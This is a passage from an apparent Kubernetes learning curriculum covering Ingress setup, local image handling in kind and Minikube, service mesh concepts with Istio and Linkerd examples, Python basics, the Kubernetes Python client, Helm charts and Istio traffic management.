kind: Ingress
metadata:
  name: webapp-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  rules:
    - host: webapp.example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: webapp-service
                port:
                  number: 80
EOF
+-------------------------------------------------+
| Kubernetes Cluster |
| |
| +-------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable..." | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +-------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/... | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +-------------------------------------+ | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Service: webapp-service | |
| | | |
| | Selector: app: webapp | |
| | Port: 80 -> targetPort: 80 | |
| +-------------------------------------------+ |
| |
| +-------------------------------------------+ |
| | Ingress: webapp-ingress | |
| | | |
| | Host: webapp.example.com | |
| | Path: / | |
| | Backend: webapp-service:80 | |
| +-------------------------------------------+ |
+-------------------------------------------------+
This updated diagram now includes:
- The original webapp-config ConfigMap with BACKGROUND_COLOR and MESSAGE.
- The webapp-content ConfigMap containing the index.html template.
- The Deployment and Pod structure, showing how these ConfigMaps are used.
- The webapp-service Service that exposes the Pods.
- The new webapp-ingress Ingress resource, which:
  - Routes traffic for the host webapp.example.com
  - Directs all paths (/) to the webapp-service on port 80
The Ingress resource acts as an entry point for external traffic into the cluster. It provides:
- Host-based routing: traffic is routed based on the webapp.example.com hostname.
- Path-based routing: in this case, all paths (/) are routed to the backend service.
- Integration with the Ingress Controller: the nginx.ingress.kubernetes.io/rewrite-target: / annotation is specific to the NGINX Ingress Controller, indicating that the path should be rewritten to / when forwarding to the backend.
The flow of traffic would now be:

External Request -> Ingress Controller -> Ingress (webapp-ingress) -> Service (webapp-service) -> Pod (webapp) -> Container (nginx:alpine)

This setup allows you to:
- Access your application from outside the cluster using a domain name (webapp.example.com).
- Potentially host multiple applications on the same IP address using different hostnames.
- Implement more complex routing rules if needed (e.g., routing different paths to different services).
Remember to ensure that:
- The Ingress Controller is installed in your cluster.
- The DNS for webapp.example.com is configured to point to your cluster's external IP.
- Any necessary TLS certificates are configured if you want to enable HTTPS.
This Ingress resource completes the basic setup of a web application in Kubernetes, providing a full path for external traffic to reach your containerized application.
- Step 6: Verify the deployment
Check if all resources are created and running:
kubectl get configmaps
kubectl get deployments
kubectl get pods
kubectl get services
kubectl get ingress
kubectl get configmaps
NAME DATA AGE
kube-root-ca.crt 1 21m
webapp-config 2 18m
webapp-content 1 13m
kubectl get deployments
NAME READY UP-TO-DATE AVAILABLE AGE
webapp 2/2 2 2 11m
kubectl get pods
NAME READY STATUS RESTARTS AGE
webapp-756448-8hz 1/1 Running 0 7m26s
webapp-756448-b6r 1/1 Running 0 7m33s
kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes       ClusterIP   10.96.0.1       <none>   443/TCP   22m
webapp-service   ClusterIP   10.107.192.80   <none>   80/TCP    5m20s
kubectl get ingress
NAME CLASS HOSTS ADDRESS PORTS AGE
webapp-ingress <none> webapp.example.com 80 3m52s
- Step 7: Access the application
If you're using Minikube, you can use port-forwarding to access the application:
kubectl port-forward service/webapp-service 8080:80
Then open a web browser and go to http://localhost:8080.

If you're using an Ingress, add the following to your /etc/hosts file:

echo "127.0.0.1 webapp.example.com" | sudo tee -a /etc/hosts

Then access the application at http://webapp.example.com.
- Step 8: Modify the configuration
Let's change the background color and message:
kubectl edit configmap webapp-config
Change the BACKGROUND_COLOR to "#e0e0e0" and the MESSAGE to "Updated configuration!".
- Step 9: Restart the Deployment to pick up the new configuration
kubectl rollout restart deployment webapp
- Step 10: Access the application again to see the changes
Day 5: Working with local K8s options
Docker Images in kind
Building a custom Docker image
- Create a Dockerfile for your application.
- Build the image: docker build -t your-image:tag .
Loading the image into kind cluster
- Use the command: kind load docker-image your-image:tag
- This copies the image from your local Docker daemon into the kind cluster.
Limitations and workarounds for Docker-in-Docker scenarios
- kind runs Kubernetes inside Docker, which can complicate building images inside the cluster.
- Workaround: Use kaniko or buildkit for in-cluster builds.
Creating deployments with custom images
- Create a deployment YAML file (e.g., deployment.yaml) referencing your custom image:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: your-app
spec:
  replicas: 1
  selector:
    matchLabels:
      app: your-app
  template:
    metadata:
      labels:
        app: your-app
    spec:
      containers:
      - name: your-app
        image: your-image:tag
        imagePullPolicy: Never
- Apply the deployment:
kubectl apply -f deployment.yaml
Working with Images in Minikube
Minikube provides several options for working with Docker images:
Using the Host Docker Daemon
- Configure your terminal to use Minikube's Docker daemon:
eval $(minikube docker-env)
- Build your image. It will now be available to Minikube without additional steps.
Loading Images into Minikube
- If you've built the image using your host's Docker daemon:
minikube image load your-image:tag
- This copies the image from your local Docker daemon into Minikube.
Creating Deployments with Custom Images
- Create a deployment YAML file (e.g., deployment.yaml) referencing your custom image:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: your-app
spec:
  replicas: 1
  selector:
    matchLabels:
      app: your-app
  template:
    metadata:
      labels:
        app: your-app
    spec:
      containers:
      - name: your-app
        image: your-image:tag
        imagePullPolicy: IfNotPresent
- Apply the deployment:
kubectl apply -f deployment.yaml
Minikube-Specific Features
Built-in Docker Registry
Minikube includes a built-in Docker registry. To use it:
- Enable the registry addon:
minikube addons enable registry
- Push your image to the Minikube registry:
docker push $(minikube ip):5000/your-image:tag
- Update your deployment to use the registry image:
image: localhost:5000/your-image:tag
Direct Image Building
- Minikube can build images directly using its Docker daemon:
minikube image build -t your-image:tag .
- This builds the image inside Minikube, making it immediately available for use.
Monitoring and Troubleshooting
- Check if your pods are running:
kubectl get pods
- If pods are not in the "Running" state, check the logs:
kubectl logs <pod-name>
- For more detailed troubleshooting, use:
kubectl describe pod <pod-name>
- To access the Minikube Docker daemon logs:
minikube logs
Cleaning Up
To remove unused images and free up space:
minikube image rm your-image:tag
By following these steps, you can effectively work with custom Docker images in your Minikube cluster, allowing you to develop and test your Kubernetes deployments locally. Minikube offers more flexibility in terms of image handling compared to kind, making it a popular choice for local Kubernetes development.
Best Practices
- Use meaningful tags for your images, preferably based on git commit hashes or semantic versioning.
- When updating your application, build a new image with a new tag, then update your deployment to use the new image tag.
- For production-like setups, consider using a private Docker registry. Minikube can be configured to pull from private registries.
Week 2: Service Mesh Concepts and Python
Day 1-2: Service Mesh
Fundamentals
Core concepts of service mesh
- A dedicated infrastructure layer for handling service-to-service communication.
- Provides features like service discovery, load balancing, encryption, observability, traceability, authentication, and authorization.
Problems service meshes solve
- Complexity in microservices communication
- Lack of observability in distributed systems
- Inconsistent security policies across services
- Difficulty in implementing resilience patterns (circuit breaking, retries)
Evolution of ingress
- From simple L7 load balancers to advanced API gateways
- Integration with service mesh for consistent policy enforcement
Service Mesh Architecture
A service mesh consists of two primary components: the data plane and the control plane.
Data Plane
The data plane is composed of a network of lightweight proxies, typically deployed as sidecars alongside each service instance. These proxies intercept and manage all network traffic to and from the service.
Example:
Let's consider a simple e-commerce application with three microservices: Product, Order, and Payment. In a service mesh, each instance of these services would have a sidecar proxy deployed alongside it:
Product Service + Sidecar Proxy Order Service + Sidecar Proxy Payment Service + Sidecar Proxy
When the Order service needs to communicate with the Payment service, the request goes through the following path:
- Order service -> Order's sidecar proxy
- Order's sidecar proxy -> Payment's sidecar proxy
- Payment's sidecar proxy -> Payment service
This allows the mesh to control and observe all inter-service communication.
Control Plane
The control plane manages and configures the proxies to enforce policies, collect telemetry, and handle service discovery.
Example:
Using Istio as an example, the control plane consists of several components:
- Pilot: Handles service discovery and traffic management
- Citadel: Manages security and access policies
- Galley: Validates configuration and distributes it to other components
The control plane would configure the sidecar proxies to implement specific routing rules, such as:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: payment-route
spec:
  hosts:
  - payment
  http:
  - route:
    - destination:
        host: payment
        subset: v1
      weight: 90
    - destination:
        host: payment
        subset: v2
      weight: 10
This configuration would route 90% of traffic to version 1 of the Payment service and 10% to version 2, enabling canary deployments or A/B testing.
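To see what those weights mean in practice, here is a small Python simulation (purely illustrative, not Istio code) of a proxy honouring a 90/10 route split:

```python
import random

def pick_subset(weights, rng):
    # Weighted random choice, mirroring how a proxy honours route weights.
    subsets = list(weights)
    return rng.choices(subsets, weights=[weights[s] for s in subsets], k=1)[0]

rng = random.Random(0)  # fixed seed so the simulation is repeatable
weights = {"v1": 90, "v2": 10}
picks = [pick_subset(weights, rng) for _ in range(10_000)]
share_v1 = picks.count("v1") / len(picks)
print(f"v1 received {share_v1:.1%} of requests")
```

Over many requests the observed split converges on the configured 90/10 ratio; any individual request still goes wholly to one subset.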
Here is an example using Linkerd's control plane. This is simpler and consists of fewer components compared to Istio. The main components are:
- Destination: Handles service discovery and provides configuration to proxies
- Identity: Manages security and certificate issuance for mTLS
- Proxy Injector: Injects the Linkerd proxy as a sidecar
For traffic splitting in Linkerd, you would use either a TrafficSplit resource (if using the SMI extension) or an HTTPRoute resource (which is the preferred method going forward).
Here's an example using HTTPRoute:
apiVersion: policy.linkerd.io/v1beta2
kind: HTTPRoute
metadata:
  name: payment-route
  namespace: your-namespace
spec:
  parentRefs:
  - name: payment
    kind: Service
    group: core
    port: 8080
  rules:
  - backendRefs:
    - name: payment-v1
      port: 8080
      weight: 90
    - name: payment-v2
      port: 8080
      weight: 10
This configuration would achieve the same result as the Istio example, routing 90% of traffic to version 1 of the Payment service and 10% to version 2.
Key Features and Use Cases
Service Discovery and Load Balancing
Service meshes provide dynamic service discovery and intelligent load balancing.
Example:
In our e-commerce application, if we scale the Payment service to three instances, the service mesh would automatically discover these instances and distribute traffic among them. It could use advanced load balancing algorithms like least connections or weighted round-robin.
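A least-connections pick, for instance, can be sketched in a few lines of Python. This is an illustration of the idea only — the mesh's sidecar proxies do this internally — and the instance names and counts are made up:

```python
def least_connections(active):
    # Choose the instance with the fewest in-flight requests.
    return min(active, key=active.get)

# Hypothetical in-flight request counts for three Payment instances.
active = {"payment-1": 12, "payment-2": 3, "payment-3": 7}
print(least_connections(active))  # -> payment-2
```

Unlike plain round-robin, this adapts automatically when one instance is slow and accumulates in-flight requests.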
Traffic Management
Service meshes offer fine-grained control over traffic routing.
Example: Implementing a canary release for the Product service:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: product-canary
spec:
  hosts:
  - product
  http:
  - match:
    - headers:
        user-agent:
          regex: ".*Chrome.*"
    route:
    - destination:
        host: product
        subset: v2
  - route:
    - destination:
        host: product
        subset: v1
This configuration routes all traffic from Chrome browsers to version 2 of the Product service, while all other traffic goes to version 1.
With Linkerd, use an HTTPRoute resource to define the traffic splitting:
apiVersion: policy.linkerd.io/v1beta2
kind: HTTPRoute
metadata:
  name: product-canary
  namespace: your-namespace
spec:
  parentRefs:
  - name: product
    kind: Service
    group: core
    port: 8080
  rules:
  - matches:
    - headers:
      - name: user-agent
        regex: ".*Chrome.*"
    backendRefs:
    - name: product-v2
      port: 8080
  - backendRefs:
    - name: product-v1
      port: 8080
This configuration routes all traffic from Chrome browsers to version 2 of the Product service, while all other traffic goes to version 1.
For more advanced canary deployments, you can use tools like Flagger with Linkerd. Flagger automates the process of creating new Kubernetes resources, watching metrics, and incrementally sending users to the new version.
Here's an example of how you might set up a Flagger canary for the Product service:
apiVersion: flagger.app/v1beta1
kind: Canary
metadata:
  name: product
  namespace: test
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: product
  service:
    port: 8080
  analysis:
    interval: 30s
    threshold: 5
    maxWeight: 50
    stepWeight: 5
    metrics:
    - name: success-rate
      threshold: 99
      interval: 1m
    - name: latency
      threshold: 500
      interval: 1m
This configuration sets up a canary deployment that gradually increases traffic to the new version while monitoring success rate and latency.
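The stepWeight/maxWeight pair implies a fixed traffic schedule. This small Python helper (an illustration, not Flagger code) shows the canary weights Flagger would step through, one step per analysis interval, before promotion:

```python
def canary_schedule(step_weight, max_weight):
    # Traffic percentages sent to the canary, one step per interval,
    # until maxWeight is reached and the canary can be promoted.
    return list(range(step_weight, max_weight + 1, step_weight))

print(canary_schedule(5, 50))
# stepWeight: 5, maxWeight: 50 -> [5, 10, 15, 20, 25, 30, 35, 40, 45, 50]
```

With a 30s interval, that is ten steps, so a healthy rollout takes roughly five minutes; a failed metric check at any step rolls traffic back instead.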
Observability
Service meshes provide detailed insights into service-to-service communication.
Example:
Using Istio with Prometheus and Grafana, you can visualize request volume, latency, and error rates for each service. You might see a dashboard showing:
- Request rate for Product service: 100 requests/second
- 95th percentile latency for Order service: 250ms
- Error rate for Payment service: 0.1%
This level of observability helps quickly identify and troubleshoot issues in the distributed system.
Linkerd provides observability capabilities similar to Istio's, though there are some differences in how it implements and presents these features.
- Using the Linkerd CLI:
linkerd viz stat deploy -n your-namespace
This command would show you a table with metrics for each deployment, including:
- Success rate
- Request per second (RPS)
- Latency (P50, P95, P99)
- Using the Linkerd dashboard:
You can access it by running:
linkerd viz dashboard
In the dashboard, you would see:
- Request rate for Product service: 100 req/sec
- 95th percentile latency for Order service: 250ms
- Success rate for Payment service: 99.9% (which is equivalent to a 0.1% error rate)
Security
Service meshes can enforce mutual TLS (mTLS) encryption and fine-grained access policies.
Example:
Enforcing mTLS between all services:
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system
spec:
  mtls:
    mode: STRICT
This configuration ensures all inter-service communication is encrypted and authenticated.
Linkerd automatically enables mTLS for all meshed services by default, so you don't need to explicitly configure it. However, if you want to ensure that only mTLS traffic is allowed, you can use Linkerd's authorization policies.
Challenges and Best Practices
While service meshes offer numerous benefits, they also introduce complexity and potential performance overhead.
Performance Considerations
The additional network hops introduced by sidecar proxies can increase latency. It's crucial to benchmark your application with and without the service mesh to understand the performance impact.
Best Practice: Start with a subset of your services in the mesh and gradually expand as you become more comfortable with the technology and its impact on your system.
Complexity Management
Service meshes add another layer to your infrastructure, which can increase operational complexity.
Best Practice: Invest time in training your team on the mesh's concepts and tooling before rolling it out widely, and document your mesh configuration as you go.
Monitoring and Troubleshooting
While service meshes provide extensive observability, the volume of data can be overwhelming.
Best Practice: Define clear Service Level Objectives (SLOs) and set up alerts based on these. Use distributed tracing to debug complex issues across services.
In conclusion, service meshes offer powerful capabilities for managing microservices architectures, but they require careful planning and implementation. By understanding the core concepts and following best practices, organizations can leverage service meshes to build more resilient, observable, and secure distributed systems.
Day 3-4: Python for Kubernetes
Python basics review (if needed)
Data Types
Python has several built-in data types:
- Numeric: int, float, complex
- Sequence: list, tuple, range
- Text: str
- Mapping: dict
- Set: set, frozenset
- Boolean: bool
Example:
Numeric Types
int (Integer)
age = 30
year = 2024
temperature = -5
x = 5
float (Floating-point)
pi = 3.14159
weight = 68.5
temperature = -2.8
y = 3.14
complex
z = 3 + 4j
w = complex(2, -3)
Sequence Types
list
fruits = ["apple", "banana", "cherry"]
numbers = [1, 2, 3, 4, 5]
mixed = [1, "two", 3.0, [4, 5]]
tuple
coordinates = (10, 20)
rgb = (255, 0, 128)
person = ("John", 30, "London")
range
numbers = range(5) # 0, 1, 2, 3, 4
even_numbers = range(0, 10, 2) # 0, 2, 4, 6, 8
Text Type
str (String)
name = "Alice"
message = 'Hello, World!'
multiline = """This is a
multiline string."""
Mapping Type
dict (Dictionary)
person = {"name": "Bob", "age": 25, "city": "Manchester"}
scores = {
    "Alice": 95,
    "Bob": 87,
    "Charlie": 92
}
Set Types
set
unique_numbers = {1, 2, 3, 4, 5}
fruits = {"apple", "banana", "cherry"}
frozenset
immutable_set = frozenset([1, 2, 3, 4, 5])
Boolean Type
bool
is_raining = True
has_licence = False
is_adult = age >= 18
Here are some examples of how these data types can be used in practice:
# Calculating area of a circle
radius = 5.0
area = pi * radius**2
print(f"The area of the circle is {area:.2f} square units")
# Working with lists
fruits.append("orange")
print(f"The second fruit is {fruits[1]}")
# Using a dictionary
print(f"{person['name']} is {person['age']} years old and lives in {person['city']}")
# Set operations
a = {1, 2, 3, 4}
b = {3, 4, 5, 6}
print(f"Union: {a | b}")
print(f"Intersection: {a & b}")
# Boolean logic
if is_adult and not is_raining:
    print("Let's go for a walk!")
These examples demonstrate the basic usage of each data type. Remember that Python is dynamically typed, meaning you don't need to declare the type of a variable explicitly. The interpreter infers the type based on the value assigned to it.
Control Structures
If-else statements:
if x > 0:
    print("Positive")
elif x < 0:
    print("Negative")
else:
    print("Zero")
For loops:
for i in range(5):
    print(i)
While loops:
count = 0
while count < 5:
    print(count)
    count += 1
Functions
def greet(name):
    return f"Hello, {name}!"

message = greet("Alice")
print(message)
Classes
class Dog:
    def __init__(self, name):
        self.name = name

    def bark(self):
        return f"{self.name} says Woof!"

my_dog = Dog("Buddy")
print(my_dog.bark())
Python Package Management
pip
pip is the standard package manager for Python. It allows you to install and manage additional packages that are not part of the Python standard library.
Installing a package:
python3 -m pip install requests
Upgrading a package:
python3 -m pip install --upgrade requests
Python Virtual Environments
Virtual environments are isolated Python environments that allow you to install packages for specific projects without affecting your system-wide Python installation.
Creating a virtual environment:
python3 -m venv .venv
Here's a breakdown of what each part of the command does:
- python3: This specifies that you are using Python 3 to execute the command. It ensures that the virtual environment is created using Python 3.
- -m venv: The -m flag tells Python to run a module as a script. In this case, it runs the venv module, which is included in the standard library from Python 3.3 onwards, for creating virtual environments.
- .venv: This is the name of the directory where the virtual environment will be created. The dot (.) at the beginning makes it a hidden directory on Unix-like systems, which is a common convention to keep your project directory tidy.
Activating a virtual environment:

On Unix or macOS:
source .venv/bin/activate

On Windows:
.venv\Scripts\activate
Installing packages in a virtual environment:
Once activated, you can use pip to install packages, and they will be isolated to this environment.
pip install requests
Deactivating a virtual environment:
deactivate
Creating a requirements file:
To share your project's dependencies, you can create a requirements.txt file:
pip freeze > requirements.txt
Installing from a requirements file:
pip install -r requirements.txt
Remember, it's good practice to use a virtual environment for each of your Python projects to avoid conflicts between package versions. For managing multiple Python versions themselves, explore pyenv.
Kubernetes Python client library
- Installation:
pip install kubernetes
This gives you authentication and configuration handling, plus the ability to create, read, update, and delete Kubernetes resources.
Simple Python scripts for Kubernetes interaction
Here are examples of what you can do:
- List pods in a namespace
- Create and manage deployments
- Watch for changes in resources
Example script to list pods:
Create a virtual environment and install the client:

python3 -m venv .venv
source .venv/bin/activate
pip install kubernetes

Then create testscript.py:
from kubernetes import client, config
config.load_kube_config()
v1 = client.CoreV1Api()
pods = v1.list_pod_for_all_namespaces(watch=False)
for pod in pods.items:
    print(f"{pod.metadata.namespace}\t{pod.metadata.name}")
Run the script:

python3 testscript.py

If running minikube, the output may look like this:
default debug-env
default webapp-6988595754-qnkqp
default webapp-6d989cd746-8wgzs
default webapp-cf544bc7c-24zpb
kube-system coredns-7db6d8ff4d-t46mv
kube-system etcd-minikube
kube-system kube-apiserver-minikube
kube-system kube-controller-manager-minikube
kube-system kube-proxy-jkgd5
kube-system kube-scheduler-minikube
kube-system storage-provisioner
You now have the basics for interacting with a Kubernetes cluster from Python.
Link: https://github.com/kubernetes-client/python
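The script above lists pods once; the "watch for changes" case uses the client's watch API (kubernetes.watch.Watch().stream(...)). The event-handling logic can be sketched without a cluster — the function below works on plain dicts shaped like the events the watch stream yields, and the sample events are made up for illustration:

```python
def summarize_events(events, limit=3):
    # Collect (event type, pod name) pairs from a watch stream,
    # stopping after `limit` events. In a real script the events
    # would come from: watch.Watch().stream(v1.list_pod_for_all_namespaces)
    seen = []
    for event in events:
        seen.append((event["type"], event["object"]["metadata"]["name"]))
        if len(seen) >= limit:
            break
    return seen

# Made-up sample events in the shape the watch stream produces.
sample = [
    {"type": "ADDED", "object": {"metadata": {"name": "webapp-1"}}},
    {"type": "MODIFIED", "object": {"metadata": {"name": "webapp-1"}}},
    {"type": "DELETED", "object": {"metadata": {"name": "webapp-1"}}},
]
print(summarize_events(sample))
```

Against a live cluster, each event reports whether a pod was added, modified, or deleted, which is the basis of controller-style "react to changes" scripts.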
Day 5: Helm Basics
Helm's Purpose and Architecture
Helm is a package manager for Kubernetes that simplifies the deployment and management of applications. It allows you to define, install, and upgrade even the most complex Kubernetes applications.
A good video tutorial: https://youtu.be/-Bq2BVdzydc
Key Components:
- Helm Client: The command-line tool used to create, package, and manage charts.
- Charts: Packages of pre-configured Kubernetes resources.
- Releases: Instances of a chart running in a Kubernetes cluster.
Creating and Structure of a Helm Chart
Let's create a chart and examine its structure:
You will need Helm installed. Then:

helm create mychart
cd mychart
The chart structure:
mychart/
  Chart.yaml      # Metadata about the chart
  values.yaml     # Default configuration values
  charts/         # Directory for chart dependencies
  templates/      # Directory for template files
    deployment.yaml
    service.yaml
    ingress.yaml
    _helpers.tpl  # Template helpers
  .helmignore     # Patterns to ignore when packaging
Chart.yaml Example:
apiVersion: v2
name: mychart
description: A Helm chart for Kubernetes
type: application
version: 0.1.0
appVersion: "1.16.0"
values.yaml Example:
replicaCount: 1
image:
  repository: nginx
  pullPolicy: IfNotPresent
  tag: ""
service:
  type: ClusterIP
  port: 80
ingress:
  enabled: false
Deploying Applications with Helm
To install a chart:
helm install myrelease ./mychart
To customize values during installation:
helm install myrelease ./mychart --set service.type=LoadBalancer
Or using a custom values file:
helm install myrelease ./mychart -f custom-values.yaml
Advanced Helm Concepts
Hooks
Hooks allow you to intervene at certain points in a release's lifecycle. Here's an example of a pre-install hook:
apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Release.Name }}-pre-install-job
  annotations:
    "helm.sh/hook": pre-install
spec:
  template:
    spec:
      containers:
      - name: pre-install-job
        image: busybox
        command: ['sh', '-c', 'echo Pre-install job running']
      restartPolicy: Never
Dependencies
You can define dependencies in the Chart.yaml file:
dependencies:
- name: apache
  version: 1.2.3
  repository: https://charts.bitnami.com/bitnami
Then, update dependencies:
helm dependency update
Templating
Helm uses Go templates. Here's an example of a template using conditionals and loops:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: {{ .Release.Name }}-deployment
spec:
  replicas: {{ .Values.replicaCount }}
  selector:
    matchLabels:
      app: {{ .Chart.Name }}
  template:
    metadata:
      labels:
        app: {{ .Chart.Name }}
    spec:
      containers:
      - name: {{ .Chart.Name }}
        image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
        ports:
        - containerPort: 80
        {{- if .Values.env }}
        env:
        {{- range $key, $value := .Values.env }}
        - name: {{ $key }}
          value: {{ $value | quote }}
        {{- end }}
        {{- end }}
Creating Helm Charts with Python Templates
While Helm natively uses Go templates, you can use Python to generate Helm charts dynamically.
Using Jinja2 for Templating
Here's an example of using Jinja2 to generate a Kubernetes manifest:
from jinja2 import Template

template = Template("""
apiVersion: apps/v1
kind: Deployment
metadata:
  name: {{ name }}-deployment
spec:
  replicas: {{ replicas }}
  selector:
    matchLabels:
      app: {{ name }}
  template:
    metadata:
      labels:
        app: {{ name }}
    spec:
      containers:
      - name: {{ name }}
        image: {{ image }}
        ports:
        - containerPort: {{ port }}
""")

rendered = template.render(
    name="myapp",
    replicas=3,
    image="nginx:latest",
    port=80
)
print(rendered)
Generating Kubernetes Manifests Dynamically
You can use Python to read configuration from various sources and generate Helm charts:
import yaml
from jinja2 import Template

def generate_chart(config):
    # Load templates
    deployment_template = Template(open('templates/deployment.yaml').read())
    service_template = Template(open('templates/service.yaml').read())
    # Render templates
    deployment = deployment_template.render(config)
    service = service_template.render(config)
    # Combine rendered templates
    chart = f"{deployment}\n---\n{service}"
    return chart

# Read configuration
with open('app_config.yaml', 'r') as f:
    config = yaml.safe_load(f)

# Generate chart
chart = generate_chart(config)

# Write chart to file
with open('generated_chart.yaml', 'w') as f:
    f.write(chart)
Integrating with CI/CD Pipelines
You can incorporate this Python-based chart generation into your CI/CD pipeline:
# Example GitLab CI job
generate_helm_chart:
  stage: build
  script:
    - pip install pyyaml jinja2
    - python generate_chart.py
  artifacts:
    paths:
      - generated_chart.yaml
This job would generate the Helm chart as part of your CI/CD process, allowing for dynamic chart creation based on your application's needs.
These examples demonstrate how to create more complex Helm charts, use advanced features, and even integrate Python for dynamic chart generation.
Week 3: Istio Deep Dive
Day 1: Istio Basics
Installing Istio on your Kubernetes cluster
Download Istio
https://istio.io/latest/docs/setup/getting-started/#download
macOS users can install via Homebrew: brew install istioctl
Install Istio
Istio provides a demo profile for testing and learning:
- It installs more components than the default profile, including:
- Istiod (the Istio control plane)
- Ingress gateway
- Egress gateway
- It enables a set of features that are suitable for demonstrating Istio's capabilities.
- It has higher resource requirements than the minimal or default profiles.
- It's not recommended for production use due to its expanded feature set and resource usage.
istioctl install --set profile=demo -y
Enable automatic sidecar injection
kubectl label namespace default istio-injection=enabled
Istio's architecture and core components
Control Plane
istiod: Combines Pilot, Citadel, and Galley into a single binary
Pilot
Pilot is a crucial module within Istiod that focuses on service discovery and traffic management. It is responsible for:
- Service Discovery: Registers services and manages their information, such as versions, IP addresses, and ports.
- Traffic Management: Directs traffic to different service versions or instances based on defined rules.
- Routing and Load Balancing: Routes traffic according to rules and balances load across services.
Pilot interacts with the data plane by configuring service proxies (like Envoy) to manage ingress and egress traffic effectively.
Citadel
Citadel is another component integrated into Istiod, primarily handling security aspects. It manages:
- Certificate Management: Provides certificate-based authentication and authorization.
- Security Policies: Enforces security policies based on service identity.
Galley
Galley was responsible for configuration management in Istio. It handled:
- Configuration Verification and Distribution: Ensured the validity of configuration rules and distributed them to other Istio components.
- Configuration Storage: Maintained properties and configuration information for Istio components.
Data Plane
Envoy proxy: Sidecar container deployed alongside each service
Addons
- Prometheus: An open-source system for metrics collection and monitoring, storing data as time series with flexible querying capabilities.
- Grafana: A platform for metrics visualization, providing a variety of visual representations to analyse time-series data from sources like Prometheus.
- Jaeger or Zipkin: Tools for distributed tracing that help monitor and troubleshoot microservices by collecting and analysing trace data.
- Kiali: A service mesh observability tool that visualizes the structure and health of an Istio service mesh, aiding in monitoring and troubleshooting.
Day 2: Istio Traffic Management
Exploring Istio's traffic management features
Virtual Services: Define routing rules for traffic
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: reviews-route
spec:
  hosts:
  - reviews
  http:
  - route:
    - destination:
        host: reviews
        subset: v1
      weight: 75
    - destination:
        host: reviews
        subset: v2
      weight: 25
This configuration defines a VirtualService for managing HTTP traffic routing to different versions (subsets) of the reviews service. It splits traffic between two subsets, v1 and v2, with 75% going to v1 and 25% going to v2.
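To build intuition for what those weights mean: each request is routed independently with probability proportional to its weight, so the split is statistical rather than an exact round-robin. A quick simulation (illustrative only, not Envoy's implementation):

```python
import random

def route(weights, rng):
    """Pick a subset with probability proportional to its weight."""
    subsets = list(weights)
    return rng.choices(subsets, weights=[weights[s] for s in subsets])[0]

rng = random.Random(42)  # seeded so the run is reproducible
counts = {"v1": 0, "v2": 0}
for _ in range(10_000):
    counts[route({"v1": 75, "v2": 25}, rng)] += 1
print(counts)  # roughly 7500 / 2500, with binomial noise
```

Over small request counts the observed split can wander noticeably from 75/25; it converges as traffic volume grows.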
Destination Rules: Define policies that apply after routing
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: reviews-destination
spec:
  host: reviews
  subsets:
  - name: v1
    labels:
      version: v1
  - name: v2
    labels:
      version: v2
This configuration defines a DestinationRule for the reviews service, specifying two subsets, v1 and v2. Each subset is identified by labels that correspond to versions of the service. These subsets are referenced in the Istio configuration of the VirtualService, to route traffic to specific versions of a service. This is useful for scenarios like canary deployments or A/B testing.
Gateways: Manage inbound and outbound traffic for the mesh
Implementing canary deployments and A/B testing
- Use VirtualService (as above) to split traffic between versions
- Gradually adjust weights to increase traffic to new version
- Monitor metrics to ensure new version performs as expected
Istio's load balancing and circuit breaking capabilities
Load Balancing: Configure in DestinationRule
spec:
  trafficPolicy:
    loadBalancer:
      simple: ROUND_ROBIN
Circuit Breaking: Define in DestinationRule
spec:
  trafficPolicy:
    outlierDetection:
      consecutive5xxErrors: 5
      interval: 5s
      baseEjectionTime: 30s
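Conceptually, outlier detection works like this: after a run of consecutive errors, a host is ejected from the load-balancing pool for a cooling-off period. A toy Python model of the settings above (the OutlierDetector class is illustrative; real Envoy also scales ejection time with repeat offences):

```python
class OutlierDetector:
    def __init__(self, consecutive_errors=5, base_ejection_time=30):
        self.consecutive_errors = consecutive_errors
        self.base_ejection_time = base_ejection_time  # seconds
        self.error_streak = 0
        self.ejected_until = 0.0  # timestamp until which the host is out

    def record(self, success, now):
        if success:
            self.error_streak = 0  # any success resets the streak
        else:
            self.error_streak += 1
            if self.error_streak >= self.consecutive_errors:
                self.ejected_until = now + self.base_ejection_time
                self.error_streak = 0

    def is_ejected(self, now):
        return now < self.ejected_until

d = OutlierDetector()
for t in range(5):               # five consecutive 5xx responses
    d.record(success=False, now=t)
print(d.is_ejected(now=5))        # True: host removed from the pool
print(d.is_ejected(now=40))       # False: ejection window has passed
```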
Day 3: Istio Security and Observability
Istio's security features
